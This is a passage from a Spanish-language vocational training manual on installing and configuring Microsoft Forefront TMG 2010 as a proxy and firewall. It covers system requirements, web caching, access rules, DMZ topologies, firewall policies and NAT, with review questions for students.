back-end de la red. Utilice esta topología cuando otro elemento de red,
como una red perimetral o un dispositivo de seguridad perimetral, se
encuentre entre Forefront TMG y la red externa. Forefront TMG se
conecta a la red interna y al elemento de red situado delante.
 Adaptador de red único: esta topología habilita funcionalidad de Forefront

TMG limitada. En esta topología, Forefront TMG está conectado
únicamente a una red, bien la red interna o una red perimetral.
Normalmente, se utilizaría esta configuración si Forefront TMG se
encontrase en la red corporativa interna o en una red perimetral y otro
firewall estuviese situado en el perímetro, protegiendo los recursos
corporativos de Internet.

Instalando el proxy/ firewall para redes de datos de Microsoft.

Los requisitos para lograr la instalación de este software, son:
Requisitos mínimos de Hardware:
Microprocesador: Procesador de dos núcleos (1 CPU x doble núcleo) de 64 bits
a 1,86 GHz.
Memoria: 2 GB RAM.
Disco duro: Espacio disponible de 2,5 GB. Este espacio en disco excluye el
necesario para el almacenamiento en caché o el almacenamiento temporal de
archivos durante la inspección de malware.
Una partición del disco duro local con el formato del sistema de archivos NTFS.
Adaptadores de red: más de un adaptador.
Debemos tomar en cuenta que solo son los requisitos mínimos, lo ideal es
implementarlo en un equipo mucho más potente.
Requisitos de Software:
Sistema operativo: Windows Server 2008
Versión: SP2 o R2
Edición: Foundation, Standard, Enterprise o Datacenter
Otros programas:
 Microsoft .NET Framework 3.5 SP1.

 API de Servicios web de Windows.
 Windows Update.
 Microsoft Windows Installer 4.5.
Roles y características de Windows:
Los roles y características que son agregados por el instalador del TMG 2010
son:
 Servidor de directivas de redes.

 Servicios de enrutamiento y acceso remoto.
 Herramientas de Active Directory Lightweight Directory Services.
 Herramientas de equilibrio de carga de red.
 Windows PowerShell.

Proceso de instalación de Forefront TMG:

Al iniciar el instalador del TMG, primero se realiza una verificación de los
requisitos previos a la instalación.
Antes de instalar el Firewall Forefront TMG, debe ejecutar la herramienta de
preparación para comprobar que las aplicaciones necesarias para la correcta
instalación de Forefront TMG se han instalado previamente en su equipo. Si
ejecuta Forefront TMG sin ejecutar previamente la herramienta de preparación,
puede que Forefront TMG no se instale correctamente en el servidor.
Las Funciones y características de Windows verificadas, son:
 Servidor de directivas de redes:

Este servidor permite crear y aplicar directivas de acceso a la red en toda
la organización con fines de mantenimiento de los equipos clientes,
autenticación de solicitudes de conexión y autorización de solicitudes de
conexión. Además, puede usar este servidor como un proxy RADIUS.
 Servicios de enrutamiento y acceso remoto:
El Servicio de enrutamiento y acceso remoto proporciona:
o Servicios de acceso telefónico y acceso remoto de red privada
virtual (VPN).
o Servicios de enrutamiento de protocolo múltiple de LAN a LAN, de
LAN a WAN, de VPN y de traducción de direcciones de red (NAT).
 Herramientas de Active Directory Lightweight Directory Services.
Es un servicio de directorio del Protocolo ligero de acceso a directorios
(LDAP) que ofrece una compatibilidad flexible para aplicaciones
habilitadas para el uso de directorios, sin las dependencias ni las
restricciones relacionadas con los dominios de los Servicios de dominio
de Active Directory (AD DS).

 Herramientas de equilibrio de carga en la red:

Proporcionan dos tecnologías de agrupación en clústeres: clústeres de
conmutación por error y equilibrio de carga de red (NLB). Los clústeres de
conmutación por error proporcionan principalmente una gran
disponibilidad; el equilibrio de carga de red proporciona escalabilidad y, al
mismo tiempo, ayuda a aumentar la disponibilidad de los servicios web.
La selección de la tecnología de clúster (clústeres de conmutación por
error o equilibrio de carga de red) depende principalmente de si las
aplicaciones que ejecuta disponen de un estado en memoria de ejecución
prolongada.
 Windows PowerShell:
Windows PowerShell es un lenguaje de scripting y Shell de línea de
comandos basado en tareas que ha sido diseñado especialmente para la
administración del sistema. Creado con Microsoft .NET Framework,
Windows PowerShell ayuda a los profesionales de TI y a los usuarios
experimentados a controlar y automatizar la administración tanto del
sistema operativo Windows como de las aplicaciones que se ejecutan en
Windows.
Los recursos de esta sección sirven para conocer Windows PowerShell,
qué características se incluyen en Windows PowerShell y el editor gráfico
de Windows PowerShell, el Entorno de scripting integrado de Windows
PowerShell.
 Microsoft .NET 3.5 Framework SP1.
 Microsoft Windows Installer 4.5.
 Windows Update.
 API de Windows Web Services:
Una vez realizada la verificación de los requisitos previos, se procede con la
Instalación del programa.
Empezaremos con la
“Preparación”, para ello
seleccionamos “Herramienta
de Preparación”:
Luego de esta preparación

ForeFront TMG está listo para
su instalación en nuestro
Sistema.

Aparecerá un asistente de instalación muy dinámico y amigable.

Ahora, debemos aceptamos los términos de licencia para la instalación de la
aplicación:
Luego seleccionamos la opción “Servicios y Administración de ForeFront TMG”

ya que instalará los servicios necesarios para una correcta administración:
A partir de aquí, empezara su comprobación en el sistema en la cual puede durar

algunos minutos.

Una vez completado, en forma correcta, el proceso de la “Preparación”,

marcamos el recuadro para que empiece el asistente la instalación:
Ahora, debe ingresar el serial y el nombre de usuario:
Seleccionamos la opción “Instalar servicios y Administración de ForeFront”:

Indicará la ruta de instalación del programa:
En este paso indicaremos el intervalo de direcciones IP para la red Interna, en

este caso vamos a indicar el siguiente intervalo de direcciones IP privadas:
192.168.1.0 – 192.168.1.255
Luego reiniciaremos los servicios y empezará el proceso de instalación que

tomará unos 40 minutos aproximadamente, dependiendo de las características
del equipo.
Finalmente iniciaremos la administración de este programa:
Se mostrará un
asistente para
configurar las
opciones de red, del
sistema y de
implementación.

Instalando y configurando los equipos Clientes del Firewall.

Los equipos cliente de firewall son equipos internos que se comunican con el
servidor de Forefront TMG a través de una de las aplicaciones clientes que a
continuación se indican:
 Cliente de Forefront TMG o cliente de Firewall: Es el software cliente

incluido con Forefront TMG o las versiones anteriores de Internet Security
and Acceleration (ISA) Server. El software de cliente se instala y habilita
en el equipo cliente de la red.
 Cliente proxy web: Puede ser cualquier aplicación que cumpla los
siguientes requisitos:
o Entiende el método correcto para realizar una solicitud de proxy
web.
o Proporciona un medio para que los clientes especifiquen un
nombre (o dirección IP) y un puerto para realizar las solicitudes de
proxy web.
o Por ejemplo, puede ser un navegador web como por ejemplo:
Microsoft Internet Explorer, EDGE, Firefox, Chrome, Safari, Opera,
etc.
 Cliente de traducción de direcciones de red segura (SecureNAT): En este

caso, no se instala ningún cliente ni aplicación especial en el equipo
cliente. La puerta de enlace predeterminada del equipo cliente se
configura con la dirección IP interna del servidor de Forefront TMG de
manera que todo el tráfico de Internet se enruta a través de Forefront
TMG.

1. ¿Cuáles son las ventajas y desventajas de utilizar un firewall Microsoft en

la red de la empresa?.
2. ¿Qué tan importante es el uso de una red DMZ en la empresa?
3. ¿Cómo se evita el acceso a páginas inapropiadas en la empresa? –
Explique.
4. ¿Qué tipos de servidores se han publicado en la empresa en la que usted
realiza la complementación de sus estudios prácticos?

TAREA
05
Tarea 05: Implementar la óptima configuración de la Cache del servidor
Firewall de Microsoft.

Entender la importancia de la caché del servidor proxy/ firewall.
Configurando Propiedades Generales de Cache.
Configurando Reglas de Cache.
“El éxito llega para todos aquellos que están ocupados buscándolo.”. (Henry
Thoreau).
 Computadora con microprocesadores core 2 Duo ó de mayor capacidad

con conexión inalámbrica.
 Access Point.
 Configurar los protocolos más importantes de seguridad en redes

inalámbricas.
 Configurar los filtros MAC.
Operaciones:
 Entender la importancia de la caché del servidor proxy/ firewall.

 Configurando Propiedades Generales de Cache.
 Configurando Reglas de Cache.
TAREA PRÁCTICA:
Configurando Propiedades Generales de la Cache y sus reglas:
En el servidor implementado en la tarea anterior, debe configurar la cache para
navegación en forma detallada:
Para realizar este procedimiento, realice los siguientes pasos:
1. En la raíz de la consola de
administración de Forefront TMG, haga
clic en el nodo Directiva de acceso
web.
2. En la ficha Tareas, haga clic en Configurar el almacenamiento en caché

de web.
Desde esta opción podrá

configurar el tamaño de
la Caché de WEB.
3. Aparecerá la ventana “Configuración de la memoria caché” y desde la

ficha “Unidades de caché” se puede modificar la capacidad de
almacenamiento, en este caso modifique la capacidad a 18 GB.
4. Desde la ficha “Reglas de caché” se pueden crear nuevas reglas, en este

caso creará una la regla siguiente:
a. El nombre de la regla será “Senati”.

b. Se aplicará al nombre de dominio: senati.edu.pe:
c. No debe almacenar objetos mayores a 2 KB.
d. Establecer el TTL como lo indicado en la imagen:
FUNDAMENTO TEÓRICO
Entender la importancia de la caché del servidor proxy/ firewall.
El uso del almacenamiento en caché es de gran importancia sobre todo a nivel
corporativo. El almacenamiento en caché es una tecnología antigua pero muy
útil, siendo requerida en diversos sectores de la industria informática y de redes.
Esta tecnología se basa en un concepto simple. El almacenamiento en caché
consiste en almacenar los datos de uso muy frecuente en una ubicación de disco
que debe contar con un rápido y fácil acceso, de modo que sea posible reducir

el tiempo y los recursos. En tal sentido, ya no es necesario recuperar datos de la

ubicación original. Como sabemos, reducir los tiempos y los recursos son
esenciales en la informática y las redes de datos, las memorias caché están
presentes en diferentes elementos, como por ejemplo, la CPU, DNS, explorador
WEB, etc.
Miles de millones de computadoras usan tecnología de caché en el procesador,
lo cual ayuda a ilustrar la importancia del almacenamiento en caché, incluso a
nivel del hardware.
Los navegadores disponen de memorias caché web para almacenar los objetos
solicitados, de modo que no sea necesario recuperar repetidas veces esos
mismos objetos desde el servidor web. Este proceso se conoce como
“almacenamiento en caché de objetos”.
El almacenamiento en caché de objetos normalmente se ha implementado para
acelerar el acceso al contenido HTTP. Además de almacenar este tipo de
contenido, algunos proveedores ampliaron la compatibilidad del almacenamiento
en caché de objetos para incluir diversos contenidos, por ejemplo, contenido
HTTPS, objetos de medios de transmisión por secuencias, FTP y archivos CIFS.
En algunos casos, el almacenamiento en caché de objetos también es
denominado “almacenamiento en caché de proxy”, puesto que se implementa
con un servidor proxy para diversos protocolos.
El mecanismo del almacenamiento en caché de objetos es simple y no requiere
de una compleja configuración. El cliente envía una solicitud de objeto (página
web, documento, imagen, video, archivo de audio, etc.) a un servidor, y el proxy
intercepta esa solicitud entre el cliente y el servidor de origen. Al recibir la
solicitud desde el cliente, el proxy comprueba si tiene una copia del objeto
solicitado en su memoria caché. De ser así, el proxy responde enviando al cliente
el objeto almacenado en caché con lo cual se ahorra tiempo y recursos, porque
de lo contrario, tendría que enviar la solicitud al servidor. Si el proxy llega a
realizar la solicitud del objeto al servidor de origen, almacena los datos del objeto
en su memoria caché, de modo que pueda cumplir con las próximas solicitudes
de ese mismo objeto sin tener que volver a recuperarlo del servidor de origen. Al
disponer del objeto en la memoria caché, no hay consumo de ancho de banda
por el contenido en el lado del servidor y se logra una importante mejora en el
tiempo de respuesta para el usuario final. La ventaja que implica el
almacenamiento en caché y el mecanismo del proxy es muy evidente, pero
deben ser tomados en cuenta algunos aspectos, tales como la capacidad de
almacenamiento y el tiempo de actualización de los contenidos, ya que si la
información de los servidores ha cambiado y el servidor proxy no ha actualizado
la memoria cache, se pueden presentar problemas muy serios.

En los servidores Proxy/Firewall se implementa una memoria caché de los

objetos solicitados con frecuencia para mejorar la velocidad de acceso web y el
rendimiento de la red. Para habilitar el almacenamiento en caché, debe asignar
específicamente un determinado espacio de disco a la memoria caché.
En el caso del servidor ForeFront TMG, después de la instalación no existe
espacio definido para la memoria caché, por lo tanto usted debe habilitar un
espacio de disco manualmente.
Configurando Propiedades Generales de Cache.
Para habilitar el almacenamiento en caché en el ForeFront TMG, debe seguir los
siguientes pasos:
1. En la raíz de la consola de administración de Forefront TMG, haga clic en
el nodo “Directiva de acceso Web” y, en Tareas relacionadas, haga clic
en Configurar almacenamiento en caché web para ingresar a las
configuraciones básicas.
2. En la ficha Unidades de caché, seleccione la entrada del servidor y haga
clic en Configurar.
3. Seleccione la unidad de disco disponible (se recomienda que sea una
unidad diferente en la que se ha instalado el sistema operativo) y, en
Tamaño máximo de caché, especifique el tamaño máximo en megabytes.
Haga clic en Establecer para guardar la configuración. Si desea regresar
el almacenamiento a 0, haga clic en Restablecer. El tamaño máximo para
un único archivo de memoria caché es 64 GB. Si es necesario un
almacenamiento en caché mayor, teniendo en cuenta que son varios los
equipos clientes, puede dividirlo entre varios archivos de distintas
unidades de disco.
OBSERVACION: La memoria caché en el servidor proxy de Microsoft

solo se puede habilitar en una unidad de disco con el sistema de archivos
NTFS.

4. Para deshabilitar el almacenamiento en caché solo debe establecer el

tamaño de la unidad de caché en 0. Compruebe las reglas de caché antes
de deshabilitar el almacenamiento en caché, ya que se puede ver
afectado el rendimiento de la navegación.
Configurando Reglas de Cache.
Las reglas de caché de Forefront TMG son utilizadas para especificar los tipos
de contenido que se pueden almacenar en la caché, así como también, se define
la forma en que se atienden los objetos desde la memoria caché hacia los
clientes. Puede configurar las reglas de caché en forma muy sencilla, mediante
el Asistente para nueva regla de caché, tal como se indica a continuación:
 En la raíz de la consola de administración de Forefront TMG, haga clic en

el nodo Directiva de acceso web.
 En la ficha Tareas, haga clic en Configurar el almacenamiento en caché
de web.
 En la ficha Reglas de caché, haga clic en Nueva. Siga las instrucciones
del asistente.
1. ¿Qué entiende usted por el término “Caché del proxy/firewall”?

2. ¿Qué importancia tiene la implementación de un servidor proxy/firewall
que cuente con una buena capacidad de caché?.
3. ¿Qué tipo de contenido almacena la caché de un proxy?

TAREA
06
Tarea 06: Implementar las directivas de firewall más importantes.
En esta tarea ralizará las siguientes Operaciones:

Configurando el Servidor de Seguridad como un servidor Proxy/
firewall con software de Microsoft.
Configurando Reglas de Acceso para la navegación en Internet.
Configurando una Red de Perímetro.
Configurando Directivas del Sistema.
Configurando la óptima Detección de Intrusos.
“Un líder es aquel que conoce el camino, transita el camino

y muestra el camino”.
Jhon C. Maxwell
.
 Computadoras con microprocesadores core 2 Duo ó de mayor

capacidad.
siguientes:
 Configurando el Servidor de Seguridad como un servidor Proxy/ firewall

con software de Microsoft.
 Configurando Reglas de Acceso para la navegación en Internet.
 Configurando una Red de Perímetro.
 Configurando Directivas del Sistema.
 Configurando la óptima Detección de Intrusos.
Operación:
TAREA PRÁCTICA:
Configurando Reglas de Acceso para la navegación en Internet con una
red perimetral y directivas.
Se realizará la configuración de una regla que permitirá navegar en Internet, pero
no se permitirá el acceso a facebook:
Para este procedimiento, realizar los pasos que a continuación se detallan:
1. Primero verificará que se pueda navegar desde la red interna, inclusive,
en Facebook:
2. Creará un nuevo conjunto de direcciones URL, el cual se llamará

“Prohibidos” y aquí agregará las direcciones no deseadas, en este caso
será: Facebook:

3. Guardará el conjunto de direcciones URL.

4. Hará clic secundario en “directiva de firewall” y escogerá la opción “Nuevo”
y luego “Regla de acceso”:
5. Se asignará un nombre para la regla:
6. Escogerá como acción de la regla: Denegar.
7. Escogerá todos los protocolos: “Todo el tráfico saliente”:

8. Como origen de la regla ingresará todas las redes incluyendo el host local:
9. Como destino de la regla se colocará el conjunto de direcciones URL:

“Prohibidos”:
10. Se aplicará para todos los usuarios.

11. Se aplicarán los cambios.
12. Verificará la navegación desde el equipo cliente:
Desde aquí se muestra

la información del
Proxy/firewall, aunque
también se puede
hacer que redireccione
a otra dirección URL o
que muestre un
mensaje.
13. No se podrá acceder a Facebook.com.

FUNDAMENTO TEORICO:
Configurando el Servidor de Seguridad como un servidor Proxy/ firewall
con software de Microsoft.
Forefront TMG es una completa solución que se utiliza para puerta de enlace
web segura, que ayuda a proteger a los empleados de una empresa de las
amenazas basadas en web. Este servidor también ofrece seguridad perimetral
de facil administración, firewall integrado, VPN, prevención de intrusiones,
inspección de malware y filtrado de URL.
Forefront TMG se fundamenta en las capacidades básicas con las que contaba
Microsoft Internet Security and Acceleration (ISA) que ofrecia una puerta de
enlace de seguridad de red completa, integrada y facil de administrar. Los
principales cambios realizados en Forefront TMG permiten agregar capacidades
de protección adicionales para ayudar a proteger la red corporativa frente a
amenazas externas que pueden tener su origen en Internet.
Entre las caracteristicas más importantes, tenemos:

 La protección contra código malintecionado web, con lo cual examina las

páginas web en busca de virus, código malintencionado y otras
amenazas.
 Filtrado de URL permite o deniega el acceso a los sitios web según
categorías de direcciones URL predeterminadas (por ejemplo,
pornografía, drogas, redes sociales, compras, etc.). Las organizaciones
no solo pueden impedir que los empleados visiten sitios con código
malintencionado conocido, sino que también pueden proteger la
productividad de la empresa limitando o bloqueando el acceso a los sitios
que se consideran distracciones que la perjudican.
 El servicio de suscripción de protección del correo electrónico que se basa
en la tecnología integrada de Forefront Protection 2010 for Exchange
Server. Forefront TMG actúa como transmisor del tráfico SMTP y examina
el correo electrónico para comprobar si contiene virus, código
malintencionado, correo y contenido no deseado (como los archivos
ejecutables o cifrados) a medida que atraviesa la red.
 La inspección de HTTPS permite que las sesiones cifradas con HTTPS
sean inspeccionadas en busca de código malintencionado o
vulnerabilidades. Algunos grupos específicos de sitios, por ejemplo, los
de banca, pueden excluirse de la inspección por motivos de privacidad. A
los usuarios del Cliente de Forefront TMG se les puede notificar la
inspección.
 El Sistema de inspección de red (NIS) permite que el tráfico de red sea
inspeccionado en busca de las posibles vulnerabilidades de Microsoft.
Según el análisis de los protocolos, NIS puede bloquear algunos tipos de
ataques al tiempo que reduce los falsos positivos.
 La traducción de direcciones de red (NAT) mejorada permite especificar
servidores de correo individuales que se pueden publicar con NAT de uno
a uno.
 Voz sobre IP mejorada permite incluir SIP(Session Initiation Protocol)
transversal, lo que facilita la implementación de Voz sobre IP dentro de la
red de la empresa.
 Forefront TMG se instala en Windows Server 2008 con compatibilidad
para 64 bits.
Configurando Reglas de Acceso para la navegación en Internet.

Para realizar la configuracion de reglas de acceso en el software Forefront TMG
debemos seguir la siguiente secuencia desde la interfaz grafica administrativa:

 En el árbol de la consola de administración de Forefront TMG, haga clic

en el nodo “Directiva de firewall” y, en el recuadro “Tareas”, haga clic en
“Crear regla de acceso”.
 En la página “Acción de la regla”, especifique si la regla debe permitir o
denegar el acceso.
 En la página “Protocolos”, para seleccionar los protocolos FTP, HTTP o
HTTPS, deje la configuración predeterminada “Protocolos seleccionados”
y haga clic en “Agregar”. En el cuadro de diálogo “Agregar protocolos”,
haga clic para expandir “Web” y, a continuación, seleccione FTP, HTTP o
HTTPS. No seleccione los protocolos que terminan en "Server". Estos
protocolos se utilizan para reglas de publicación de servidor no web, no
para el acceso saliente.
 En la página “Inspección de código malintencionado”, seleccione si se
habilita la inspección de código malintencionado para la regla. Para
habilitar esta configuración, la inspección de código malintencionado debe
estar habilitada de forma global.
 En la página “Orígenes de regla de acceso”, seleccione los objetos de red
desde los que se recibirán las solicitudes.
 En la página “Destinos de regla de acceso”, seleccione los lugares adonde
se enviarán las solicitudes recibidas. Para el acceso web seleccione la red
“Externa”(Internet).
 En la página “Usuarios”, seleccione si las solicitudes para la regla se
deben autenticar. Para el acceso anónimo deje la configuración “Todos
los usuarios” predeterminada. Para especificar que la regla solo se
aplicará a un grupo concreto de usuarios, haga clic en “Agregar” y, a
continuación, seleccione conjuntos de usuarios predefinidos o cree un
conjunto de usuarios personalizado.
Configurando una Red de Perímetro.
Recordemos que en esta topología, Forefront TMG se encuentra en el perímetro
de la red, donde actúa como firewall perimetral de la organización, y está
conectado a dos redes: la red interna y la red externa que normalmente es la red
de Internet.

Para realizar una optima configuración del TMG para una red perimetral, se
deben seguir los pasos que a continuación se detallan:
1. El servidor de seguridad puede trabajar en una red que tenga un directorio
activo (Active Directory) o simplemente con servidores independientes.
2. Para este caso se utilizara un DC (controlador de dominio), por
consiguiente, se tendrán 2 servidores con Windows Server, pudiendo ser
el DC un servidor con Windows Server 2012 R2, 2012 o 2008 R2.
3. El servidor donde se instalará el Forefront TMG debe contar con el
sistema Windows Server 2008 R2.
4. En el servidor que será un controlador de dominio, se instalarán el
Directorio Activo y el servicio DNS (si no existe previamente un servidor
DNS en la red).
5. Se colocarán las configuraciones de red adecuadas.
6. Se instalará el servidor de seguridad como un servidor miembro del
dominio.
7. Se ingresará en el servidor de seguridad con una cuenta administrativa
del dominio.
8. El servidor TMG tendrá 2
tarjetas de red, una tarjeta
estará conectada a la red
Interna y la otra tarjeta se
conectará a la red externa.
9. Insertamos el Disco con el
Instalador TMG en el servidor
de seguridad para iniciar el
proceso de instalación.
10. Empezará con la instalación
de las herramientas de
preparación.
11. Se deben aceptar los términos de licencia:

12. Cuando se solicite el tipo de instalación, debe escoger “Servicios y

administración de Forefront TMG” que es la opción completa se requiere
en estos casos:
13. Se abre el asistente de instalación del TMG:
14. Luego se mostrará un cuadro de dialogo en el asistente solicitando

información del cliente, siendo los datos solicitados: Nombre del usuario,
organización y número de serie del producto:

15. Luego se mostrará la ruta de acceso de instalación:
16. Ahora se solicitará la tarjeta de red que se conectará a la red INTERNA,

en este caso se denominará “RED INTERNA”:
17. Se mostrará el rango de direcciones IP asociado a esta interface.

18. Mostrará los servicios que se reiniciaran:
19. Ahora comenzará la instalación y tomará varios minutos:

20. Además se instalarán los complementos:
21. Veremos una ventana que nos indicará que se instaló el TMG
correctamente:

22. Haga clic en “Finalizar”.

23. Se finalizó la instalación y se abrirá la consola de TMG FOREFRONT:
24. Finalmente se visualizará la consola del TMG 2010:
Configurando una Red con DMZ.
Tomando en consideración una topología

más elaborada en la que se cuente con una
red LAN, DMZ Y WAN; todas centralizadas
por un Firewall en software en Microsoft
Forefront TMG, se realizará el siguiente
procedimiento:
El servidor de seguridad contará con tres
tarjetas de red:

 Tarjeta de Red para la RED INTERNA (LAN).

 Tarjeta de Red para la RED DMZ.
 Tarjeta de Red para la RED WAN (INTERNET).
El Sistema Operativo a utilizar será “Windows Server 2008 R2”.
El procedimiento de configuración utilizando esta topología, es el siguiente:
1. Iniciamos el servidor de seguridad y procedemos a ver las tarjetas de red
que posee, debemos comenzar a configurarlas.
2. Se asignarán las direcciones IP a las 3 tarjetas de red del servidor TMG.

3. Configuradas las 3 tarjetas de red con sus respectivas direcciones,
procedemos entonces a copiar el ejecutable del TMG para tenerlo en
nuestro servidor.
4. Procedemos a ejecutar el instalador del Forefront.
5. Se mostrará el wizards (Asistente) de instalación.
6. Realizamos los procedimientos descritos en el caso anterior:
“Configurando una Red de Perímetro”.
7. Luego se llegará a la parte en que el asistente solicita el nombre de la red
Interna y su respectivo conjunto de
direcciones IP.
8. En este caso escogeremos el
adaptador denominado “LAN” que
sería utilizado como puerta de enlace
de la “RED INTERNA”.
9. Se mostrarán los rangos de direcciones IP para esta red.
10. Se mostrará un cuadro de dialogo del asistente indicando los servicios
que se van a reiniciar.
11. Luego se visualizará la ventana de instalación.

12. Una vez terminado el proceso de instalación, incluyendo los componentes

adicionales, esperamos el nuevo asistente para configurar la red.
13. En el asistente para configurar las características de las redes, debemos

definir la plantilla a utilizar, dependiendo de la topología requerida.
14. En este caso escogerá “3-leg perimeter” que nos permitirá tener una red
LAN, DMZ y WAN.
15. Primero escogeremos la Red LAN, con lo cual también aparecerá el rango
de direcciones IP que se utilizarán en esta red:

16. Ahora seleccionamos el adaptador conectado a la WAN:
17. Ahora agregaremos la red DMZ como una red que se encuentra
conectada en nuestro perímetro.
18. Las demás configuraciones las dejamos por defecto y terminamos con
esta parte del asistente:

19. Agregamos una determinada cache para WEB:
20. Luego, aparecerá la interfaz de administración, desde la cual podremos

crear las reglas y directivas:

Configurando Directivas de Firewall

Del sitio de Microsoft, que es el fabricante de este producto, se indica que con
Forefront TMG, se pueden crear directivas de firewall, que pueden incluir un
conjunto de reglas de acceso y reglas de publicación que determinan el modo en
que los clientes tienen acceso a los recursos a través de las redes.
Directivas y conjuntos de reglas
Forefront TMG controla el acceso a la RED INTERNA aplicando diversas
directivas que determinan si se deben permiten o no las conexiones entre redes.
Estas directivas pueden ser de los siguientes tipos:
1. Directiva de firewall: inspecciona y filtra las conexiones entre la red interna
e Internet. La directiva de firewall se compone de los siguientes conjuntos
de reglas:
a. Reglas de acceso: controle el acceso web saliente, es decir,
obtenga acceso desde el equipo interno a Internet.
b. Reglas de publicación de web: controle el acceso de entrada a los
servidores web publicados.
c. Reglas de publicación de servidor: controle el acceso de entrada a
los servidores no web publicados.
2. Directiva del sistema: controla el tráfico a la red de host local o desde el

servidor de Forefront TMG para permitir el tráfico y los protocolos
necesarios para que Forefront TMG lleve a cabo la autenticación, la
pertenencia al dominio, los diagnósticos de red, el registro y la
administración remota. TMG proporciona un conjunto de reglas
predefinidas, que se crea durante la instalación del sistema.
3. Reglas de red: especifican que los recursos de una red tienen permiso
para comunicarse con recursos de otras redes y especifican el tipo de
relación (de enrutamiento o NAT) que existe entre el origen y el destino.
Para el procesamiento de las reglas, debemos tener claros algunos conceptos:

Forefront TMG procesa las solicitudes de la siguiente manera:
 Comprueba la solicitud frente a las reglas de red para comprobar que

exista la relación de red requerida entre el origen y el destino de la
solicitud.
 Comprueba la solicitud con la directiva del sistema para determinar si una
de estas reglas del sistema permite o deniega la solicitud.

 Comprueba la solicitud con la directiva de firewall en el orden de aparición

de las reglas en la lista.
 Tras hacer coincidir la solicitud con una regla, Forefront TMG vuelve a
comprobar las reglas de red (excepto el tráfico que administra el filtro
proxy web) para determinar si se debe enrutar o aplicar la NAT al tráfico.
Con respecto a la creación de las reglas de acceso, que administran las
solicitudes de clientes internos que sólo se pueden configurar con definiciones
de protocolo salientes, se deben tomas en cuenta los siguientes puntos:
 Protocolo: la regla debe definir uno o más protocolos con una dirección
saliente, por ejemplo: http, smtp, etc…).
 De: La dirección de origen debe estar bien definida en la regla. El origen
puede ser toda la red, un conjunto de redes, un conjunto de equipos, un
intervalo de direcciones IP, una subred o un equipo.
 Programación: La programación de la regla permite controlar los días y
horas que se aplica la regla.
 A: el destino debe estar bien definido en la regla. El destino puede ser
toda la red, un conjunto de redes, un equipo o un conjunto de equipos, un
intervalo de direcciones IP, una subred, un conjunto de nombres de
dominios o un conjunto de direcciones URL.
 Usuarios: la regla se aplica a todos los usuarios (para acceso anónimo),
a todos los usuarios autenticados (que se aplica a todos los usuarios que
se pueden autenticar correctamente) o a un grupo de usuarios específico.
En caso de contar con un directorio activo, esto es de gran utilidad.
 Grupos de contenido: la regla se aplica a los tipos de contenido
específicos, como pueden ser: video, imágenes, audio, etc…
 Si la solicitud coincide con una regla de permiso, la solicitud se permite.
Tras encontrar una regla coincidente, Forefront TMG no evalúa más
reglas. Las reglas de acceso que deniegan el tráfico se procesan antes
que las reglas de publicación.
Cuando se crean reglas de publicación deben considerarse las siguientes
opciones:
 Reglas de publicación de web: Habilita el acceso de entrada a los

servidores web publicados. Para solicitudes HTTP o HTTPS a una
escucha web, Forefront TMG comprueba las reglas de publicación y, a
continuación, las reglas de encadenamiento web para determinar si se
permite la solicitud.
 Reglas de publicación de servidor: habilite el acceso de entrada a los
servidores no web publicados. En el caso de solicitudes no HTTP,

Forefront TMG comprueba las reglas de red y, después, las reglas de

publicación para determinar si se aceptan las solicitudes.
Al utilizar nombres y direcciones, TMG los procesa tomando en cuenta las
siguientes opciones:
 Si una solicitud HTTP usa un nombre de sitio, como

http://www.empresa.com, Forefront TMG realiza una resolución de
nombres directa para un servidor DNS para obtener el FQDN, los alias y
las direcciones IP asociadas.
 Si una solicitud HTTP usa una dirección IP, Forefront TMG comprueba
primero si una regla coincide con la dirección. Durante este proceso, si
Forefront TMG encuentra una regla que requiere un nombre, realiza la
resolución de nombres inversa para obtener el FQDN para esa dirección
IP. Luego, Forefront TMG puede comparar el FQDN con las definiciones
de regla de acceso.
 Si no se realiza correctamente la resolución de nombres inversa, sólo se
utilizará la dirección IP original en la solicitud para la comparación con las
definiciones de regla creada.
Cuando una regla creada requiere autenticación, Forefront TMG solicita al cliente
presentar las credenciales adecuadas. Si el cliente no puede proporcionar
credenciales, se cancela la solicitud antes de que se evalúe la regla. Los clientes
SecureNAT no pueden proporcionar credenciales y si una solicitud de un cliente
SecureNAT coincide con una regla que necesita autenticación, la solicitud se
descarta directamente.
Las reglas de red especifican la manera en la que se envía el tráfico entre las
redes de origen y destino. Se puede usar una de las siguientes opciones con
respecto a cada regla de red:
 Relación de ruta: Estas relaciones son bidireccionales. Por ejemplo, si una

regla de red define una relación de ruta desde la red A a la red B, también
existe una relación desde la red B a la red A. Las solicitudes del cliente
desde la red de origen o destino se reenvían directamente a la otra red,
con las direcciones IP de destino y de origen sin modificar. Utilice una
relación de ruta donde no sea necesario que las direcciones IP estén
ocultas entre redes. La relación de ruta se utilizan entre dos redes con
direcciones IP públicas o entre dos redes con direcciones privadas. En
estos casos, los hosts de cada red deben definir la dirección IP de
Forefront TMG en su red local como la ruta hacia la otra red.
 Relación NAT: Se ejecuta de la siguiente forma:

o En las reglas de acceso, Forefront TMG sustituye la dirección IP

del cliente en la red de origen por la dirección IP predeterminada
de Forefront TMG en la red de destino. Por ejemplo, si crea una
relación NAT en una regla de red entre la red interna y la red
externa, la dirección IP de origen correspondiente a una solicitud
de la red interna se sustituye por la dirección IP predeterminada del
adaptador de red de Forefront TMG conectado a la red externa.
Las reglas de acceso que administran el tráfico entre redes
definidas con una relación NAT solo pueden usar la red de origen
especificada en la ficha De y la red de destino especificada en la
ficha A de la regla.
o En las reglas de publicación de servidor, el cliente de la red de
destino establece una conexión con la dirección IP de Forefront
TMG en la que la regla de publicación está escuchando solicitudes.
Cuando Forefront TMG reenvía el tráfico al servidor publicado,
sustituye la dirección IP de Forefront TMG por la del servidor
interno que esté publicando, pero no modifica la dirección IP de
origen. Tenga en cuenta que, en una relación NAT, las reglas de
publicación de servidor sólo pueden tener acceso a la red
especificada como red de destino. Además, como la publicación de
servidores en redes con NAT deja intacta la dirección IP de origen
al reenviar tráfico al servidor publicado, éste debe usar el equipo
de Forefront TMG como último salto en la estructura de
enrutamiento dirigida a la red de destino.
1. ¿Qué diferencia en el nivel de seguridad se

puede observar entre los sistemas de
archivos FAT 32, NTFS, Ext4, etc.?
2. Explique la diferencia que existe entre la

configuración en la ficha compartir y la ficha seguridad en las propiedades
de una carpeta creada en una unidad NTFS.
3. ¿Cómo se reconoce una carpeta compartida administrativa?.
4. Teniendo en cuenta la seguridad de las carpetas y archivos, ¿Qué
entiende usted por “ACL”?

TAREA
07
Tarea 07: Realizar la óptima configuración del Acceso a los Recursos de
la Red Interna mediante la publicación de servidores.
En esta tarea se realizarán las siguientes Operaciones:
